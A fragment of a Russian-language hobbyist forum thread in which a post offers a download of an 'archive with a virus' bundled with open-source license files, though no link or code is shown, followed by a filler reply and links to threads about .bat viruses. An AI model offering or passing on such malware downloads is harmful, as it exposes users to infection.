Скачать Архив с Вирусом. В Архиве так-же есть и лицензии: APACHE, GNU, MIT, MOZILLA.

Ссылки отдельно:
 
Пользователь вне форума    
  , 20:23   #60
Местный
 
Аватар для artel87
 
Регистрация: 31.03.2010
Сообщений: 239

Репутация: 54 / 1
По умолчанию

вода
 
Пользователь вне форума    

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Статья] Bat вирусы pcgame58 Windows 20 03.04.2014 13:56
Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ alexfedoruk За чашечкой чая 53 19.08.2012 11:01
Alexfedoruk alexfedoruk Блоги 196 25.04.2011 15:38
[FAQ] Введение в BAT. Урок 1 in-net Другие Языки 0 27.08.2010 20:41
.Bat Новое это забытое старое! SpAcE_MaN Новичкам 3 05.08.2010 18:58



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.